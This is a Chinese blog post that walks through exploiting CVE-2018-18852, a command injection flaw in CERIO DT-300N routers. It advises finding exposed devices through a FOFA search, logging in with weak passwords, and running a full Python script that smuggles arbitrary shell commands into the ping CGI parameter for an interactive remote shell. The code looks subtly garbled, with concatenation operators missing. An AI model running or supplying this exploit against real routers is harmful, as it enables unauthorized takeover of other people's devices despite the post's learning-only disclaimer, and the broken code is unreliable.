网络安全技术 ·

CVE-2018-18852 简单利用


漏洞详情

CERIO DT-300N是中国台湾智鼎资讯(CERIO)公司的一款无线路由器。CERIO DT-300N 1.1.6版本至1.1.12版本中存在操作命令注入漏洞攻击者可利用该漏洞执行ping命令。

漏洞利用

查找具备漏洞版本的目标,这里利用FOFA搜索的 title="CERIO" 关键信息,然后找个弱口令登入进去。

编辑代码另存为ok.py(大佬代码如下)

  #author:九世  #time:2019/1/30    import requests  import json  import base64    class Demo:      def __init__(self,headers,url,payload,url2):          self.headers=headers          self.url=url          self.payload=payload          self.url2=url2        def requet(self):          ver = 'DT-300N-NGS-M'          ver2='DT-300N'          version=''          vurl=''          rqt=requests.post(url=self.url,headers=self.headers,data=self.payload)          nurl=''          nersion=''          if rqt.status_code==requests.codes.ok:              print('[ ] Router version number is {}'.format(ver))              while True:                  rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)                  nurl =rqt.url                  nersion =ver                  nary=json.loads(rqt.content)                  cmd = input('command:')                  payload = {'ip': '127.0.0.1;' 'echo "[[[";' cmd, 'pid': nary['pid'], 'Times': 1}                  self.command(self.url, headers, payload,nersion)            elif rqt.status_code==requests.codes.not_found: #判断状态码是否为404              print('[-] Router version number is not {}'.format(ver))              rqts=requests.post(url=self.url2,headers=headers,data=self.payload)              if rqts.status_code==requests.codes.ok:                  print('[ ] Router version number is {}'.format(ver2))                  while True:                      rqts = requests.post(url=self.url2, headers=headers, data=self.payload)                      version =ver2                      vurl =rqts.url                      vary=json.loads(rqts.content)                      cmd=input('command:')                      payload = {'ip': '127.0.0.1;' 'echo "[[[";' cmd, 'pid': vary, 'Times': 1}                      self.command(self.url2,headers,payload,version)              elif rqts.status_code==requests.codes.not_found:                  print('[-] Router version number is not {}'.format(ver2))                  exit()              elif rqts.status_code==requests.codes.unauthorized:                  print('[-] Auth is invalid, try other creds')                  exit()        def command(self,url,header,data,ver):          rsv=requests.post(url=url,headers=header,data=data)          if ver=='DT-300N':              print(rsv.text.split('/html')[1])          else:              print(rsv.text.split('[[[')[1])  if __name__ == '__main__':      print('[&]')      print('[!] CERIO DT-300N-NGS-Mn[!] CERIO DT-300N')      print('')      t=''      path='/cgi-bin/main.cgi?cgi=PING&mode=9'      path2='/cgi-bin/Save.cgi?cgi=PING'      user=input('host:').strip()      ports=input('port:').strip()      username=input('creds:').strip()      creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8')      if ports in '443':          t ='https://'      else:          t ='http://'          urls=t user ':' ports path      urls2=t user ':' ports path2      payload={'cgi':'PING','mode':9}      headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)}      obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2)      obj.requet()

运行命令


python3 ok.py   

利用成功,可以返回当前用户信息

注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

参与评论